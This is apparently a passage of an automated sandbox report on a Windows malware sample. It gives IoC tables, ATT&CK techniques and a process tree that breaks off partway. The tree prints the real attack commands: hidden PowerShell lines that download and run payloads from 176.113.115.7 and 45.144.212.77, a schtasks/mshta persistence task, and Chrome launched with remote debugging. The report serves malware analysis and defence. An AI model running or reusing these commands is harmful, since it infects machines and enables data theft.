36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	FvbuInU.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1008	schtasks.exe
2800	schtasks.exe
2088	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2604	powershell.exe
2604	powershell.exe
2604	powershell.exe
2480	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
1412	rapes.exe
2156	powershell.exe
2156	powershell.exe
2156	powershell.exe
2308	powershell.exe
3040	ILqcVeT.exe
2788	vertualiziren.exe
3040	ILqcVeT.exe
3040	ILqcVeT.exe
2628	chrome.exe
2628	chrome.exe
3040	ILqcVeT.exe
3040	ILqcVeT.exe
1996	rXOl0pp.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
2844	powershell.exe
3040	ILqcVeT.exe
1996	rXOl0pp.exe
1996	rXOl0pp.exe
2328	chrome.exe
2328	chrome.exe
1848	v6Oqdnc.exe
1848	v6Oqdnc.exe
1996	rXOl0pp.exe
1996	rXOl0pp.exe
1996	rXOl0pp.exe
3368	chrome.exe
3368	chrome.exe
1996	rXOl0pp.exe
1996	rXOl0pp.exe
1996	rXOl0pp.exe
1196	chrome.exe
1196	chrome.exe
1308	qjdkxjv.exe
1308	qjdkxjv.exe
1996	rXOl0pp.exe
1996	rXOl0pp.exe
3648	FvbuInU.exe
1996	rXOl0pp.exe
2704	ILqcVeT.exe
3648	FvbuInU.exe
3648	FvbuInU.exe
3648	FvbuInU.exe
3648	FvbuInU.exe
2704	ILqcVeT.exe
2704	ILqcVeT.exe
3292	chrome.exe
3292	chrome.exe
2852	rXOl0pp.exe
2852	rXOl0pp.exe
2704	ILqcVeT.exe
2704	ILqcVeT.exe
2704	ILqcVeT.exe
3612	chrome.exe
3612	chrome.exe
2216	powershell.exe
2216	powershell.exe
2216	powershell.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

description	pid	Process
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeShutdownPrivilege	2628	chrome.exe
Token: SeShutdownPrivilege	2628	chrome.exe
Token: SeShutdownPrivilege	2628	chrome.exe
Token: SeShutdownPrivilege	2628	chrome.exe
Token: SeShutdownPrivilege	2628	chrome.exe
Token: SeShutdownPrivilege	2628	chrome.exe
Token: SeShutdownPrivilege	2628	chrome.exe
Token: SeShutdownPrivilege	2628	chrome.exe
Token: SeShutdownPrivilege	2628	chrome.exe
Token: SeShutdownPrivilege	2628	chrome.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeShutdownPrivilege	2328	chrome.exe
Token: SeShutdownPrivilege	2328	chrome.exe
Token: SeShutdownPrivilege	2328	chrome.exe
Token: SeShutdownPrivilege	2328	chrome.exe
Token: SeShutdownPrivilege	2328	chrome.exe
Token: SeShutdownPrivilege	2328	chrome.exe
Token: SeShutdownPrivilege	2328	chrome.exe
Token: SeShutdownPrivilege	2328	chrome.exe
Token: SeShutdownPrivilege	2328	chrome.exe
Token: SeShutdownPrivilege	2328	chrome.exe
Token: SeShutdownPrivilege	2328	chrome.exe
Token: SeShutdownPrivilege	2328	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	3368	chrome.exe
Token: SeShutdownPrivilege	1196	chrome.exe
Token: SeShutdownPrivilege	1196	chrome.exe
Token: SeShutdownPrivilege	1196	chrome.exe
Token: SeShutdownPrivilege	1196	chrome.exe
Token: SeShutdownPrivilege	1196	chrome.exe
Token: SeShutdownPrivilege	1196	chrome.exe
Token: SeShutdownPrivilege	1196	chrome.exe
Token: SeShutdownPrivilege	1196	chrome.exe
Token: SeShutdownPrivilege	3292	chrome.exe
Token: SeShutdownPrivilege	3292	chrome.exe
Token: SeShutdownPrivilege	3292	chrome.exe
Token: SeShutdownPrivilege	3292	chrome.exe
Token: SeShutdownPrivilege	3292	chrome.exe
Token: SeShutdownPrivilege	3292	chrome.exe
Token: SeShutdownPrivilege	3292	chrome.exe
Token: SeShutdownPrivilege	3292	chrome.exe
Token: SeShutdownPrivilege	3292	chrome.exe
Token: SeShutdownPrivilege	3292	chrome.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeShutdownPrivilege	3612	chrome.exe
Token: SeShutdownPrivilege	3612	chrome.exe
Token: SeShutdownPrivilege	3612	chrome.exe
Token: SeShutdownPrivilege	3612	chrome.exe
Token: SeShutdownPrivilege	3612	chrome.exe
Token: SeShutdownPrivilege	3612	chrome.exe

Suspicious use of FindShellTrayWindow 14 IoCs

pid	Process
2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe
2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe
2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe
2480	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
1620	nhDLtPT.exe
2628	chrome.exe
2328	chrome.exe
3368	chrome.exe
1196	chrome.exe
3292	chrome.exe
3612	chrome.exe
3428	03aa9b8fea.exe
3428	03aa9b8fea.exe
3428	03aa9b8fea.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe
2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe
2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe
3428	03aa9b8fea.exe
3428	03aa9b8fea.exe
3428	03aa9b8fea.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2192 wrote to memory of 2988	2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe	28
PID 2192 wrote to memory of 2988	2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe	28
PID 2192 wrote to memory of 2988	2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe	28
PID 2192 wrote to memory of 2988	2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe	28
PID 2192 wrote to memory of 1588	2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe	29
PID 2192 wrote to memory of 1588	2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe	29
PID 2192 wrote to memory of 1588	2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe	29
PID 2192 wrote to memory of 1588	2192	bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe	29
PID 2988 wrote to memory of 2088	2988	cmd.exe	31
PID 2988 wrote to memory of 2088	2988	cmd.exe	31
PID 2988 wrote to memory of 2088	2988	cmd.exe	31
PID 2988 wrote to memory of 2088	2988	cmd.exe	31
PID 1588 wrote to memory of 2604	1588	mshta.exe	32
PID 1588 wrote to memory of 2604	1588	mshta.exe	32
PID 1588 wrote to memory of 2604	1588	mshta.exe	32
PID 1588 wrote to memory of 2604	1588	mshta.exe	32
PID 2604 wrote to memory of 2480	2604	powershell.exe	34
PID 2604 wrote to memory of 2480	2604	powershell.exe	34
PID 2604 wrote to memory of 2480	2604	powershell.exe	34
PID 2604 wrote to memory of 2480	2604	powershell.exe	34
PID 2480 wrote to memory of 1412	2480	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE	35
PID 2480 wrote to memory of 1412	2480	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE	35
PID 2480 wrote to memory of 1412	2480	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE	35
PID 2480 wrote to memory of 1412	2480	TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE	35
PID 1412 wrote to memory of 2684	1412	rapes.exe	37
PID 1412 wrote to memory of 2684	1412	rapes.exe	37
PID 1412 wrote to memory of 2684	1412	rapes.exe	37
PID 1412 wrote to memory of 2684	1412	rapes.exe	37
PID 2684 wrote to memory of 1876	2684	PcAIvJ0.exe	38
PID 2684 wrote to memory of 1876	2684	PcAIvJ0.exe	38
PID 2684 wrote to memory of 1876	2684	PcAIvJ0.exe	38
PID 1876 wrote to memory of 2156	1876	cmd.exe	40
PID 1876 wrote to memory of 2156	1876	cmd.exe	40
PID 1876 wrote to memory of 2156	1876	cmd.exe	40
PID 2156 wrote to memory of 2308	2156	powershell.exe	41
PID 2156 wrote to memory of 2308	2156	powershell.exe	41
PID 2156 wrote to memory of 2308	2156	powershell.exe	41
PID 1412 wrote to memory of 1620	1412	rapes.exe	43
PID 1412 wrote to memory of 1620	1412	rapes.exe	43
PID 1412 wrote to memory of 1620	1412	rapes.exe	43
PID 1412 wrote to memory of 1620	1412	rapes.exe	43
PID 1620 wrote to memory of 2084	1620	nhDLtPT.exe	44
PID 1620 wrote to memory of 2084	1620	nhDLtPT.exe	44
PID 1620 wrote to memory of 2084	1620	nhDLtPT.exe	44
PID 1620 wrote to memory of 2084	1620	nhDLtPT.exe	44
PID 1412 wrote to memory of 3040	1412	rapes.exe	46
PID 1412 wrote to memory of 3040	1412	rapes.exe	46
PID 1412 wrote to memory of 3040	1412	rapes.exe	46
PID 1412 wrote to memory of 3040	1412	rapes.exe	46
PID 2084 wrote to memory of 2788	2084	Gxtuum.exe	47
PID 2084 wrote to memory of 2788	2084	Gxtuum.exe	47
PID 2084 wrote to memory of 2788	2084	Gxtuum.exe	47
PID 2084 wrote to memory of 2788	2084	Gxtuum.exe	47
PID 3040 wrote to memory of 2628	3040	ILqcVeT.exe	48
PID 3040 wrote to memory of 2628	3040	ILqcVeT.exe	48
PID 3040 wrote to memory of 2628	3040	ILqcVeT.exe	48
PID 3040 wrote to memory of 2628	3040	ILqcVeT.exe	48
PID 2628 wrote to memory of 2468	2628	chrome.exe	49
PID 2628 wrote to memory of 2468	2628	chrome.exe	49
PID 2628 wrote to memory of 2468	2628	chrome.exe	49
PID 2628 wrote to memory of 1748	2628	chrome.exe	50
PID 2628 wrote to memory of 1748	2628	chrome.exe	50
PID 2628 wrote to memory of 1748	2628	chrome.exe	50
PID 2628 wrote to memory of 580	2628	chrome.exe	52

C:\Users\Admin\AppData\Local\Temp\bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe
"C:\Users\Admin\AppData\Local\Temp\bd4d8b456fa6f5350ab0d8fa25cf9cbf47f515b67f0badaa7a0139eefb39d99e.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn yC1L6maeOoq /tr "mshta C:\Users\Admin\AppData\Local\Temp\JMz1DFpdy.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2988
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn yC1L6maeOoq /tr "mshta C:\Users\Admin\AppData\Local\Temp\JMz1DFpdy.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2088
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\JMz1DFpdy.hta
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:1588
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2604
  - - C:\Users\Admin\AppData\Local\TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE
      "C:\Users\Admin\AppData\Local\TempYEZMN7OOVFMDRMDQK1MLWZELATLPTRR9.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2480
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1412
      - C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2684
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\90CB.tmp\90CC.tmp\90CD.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308
      - C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
        7⤵
        Downloads MZ/PE file
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2084
        
        C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
        
        "C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2788
      - C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3040
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:2628
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7c89758,0x7fef7c89768,0x7fef7c89778
        8⤵
        
        PID:2468
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:1748
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1132 --field-trial-handle=1352,i,15140850668989547629,15380198250660156800,131072 /prefetch:2
        8⤵
        
        PID:580
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1352,i,15140850668989547629,15380198250660156800,131072 /prefetch:8
        8⤵
        
        PID:2704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1352,i,15140850668989547629,15380198250660156800,131072 /prefetch:8
        8⤵
        
        PID:1776
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2088 --field-trial-handle=1352,i,15140850668989547629,15380198250660156800,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2392 --field-trial-handle=1352,i,15140850668989547629,15380198250660156800,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1616
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2424 --field-trial-handle=1352,i,15140850668989547629,15380198250660156800,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1516
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1384 --field-trial-handle=1352,i,15140850668989547629,15380198250660156800,131072 /prefetch:2
        8⤵
        
        PID:2360
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        
        PID:2404
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7c89758,0x7fef7c89768,0x7fef7c89778
        8⤵
        
        PID:2008
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:2496
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1308,i,11463231426258501154,10584747318541417943,131072 /prefetch:2
        8⤵
        
        PID:1420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1308,i,11463231426258501154,10584747318541417943,131072 /prefetch:8
        8⤵
        
        PID:2216
      - C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1996
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2328
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6d19758,0x7fef6d19768,0x7fef6d19778
        8⤵
        
        PID:1668
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:2780
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1164 --field-trial-handle=1468,i,328667954511933558,15527900849454057401,131072 /prefetch:2
        8⤵
        
        PID:1912
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1384 --field-trial-handle=1468,i,328667954511933558,15527900849454057401,131072 /prefetch:8
        8⤵
        
        PID:2772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 --field-trial-handle=1468,i,328667954511933558,15527900849454057401,131072 /prefetch:8
        8⤵
        
        PID:2652
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2480 --field-trial-handle=1468,i,328667954511933558,15527900849454057401,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1552
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2412 --field-trial-handle=1468,i,328667954511933558,15527900849454057401,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2536
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2856 --field-trial-handle=1468,i,328667954511933558,15527900849454057401,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1884
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
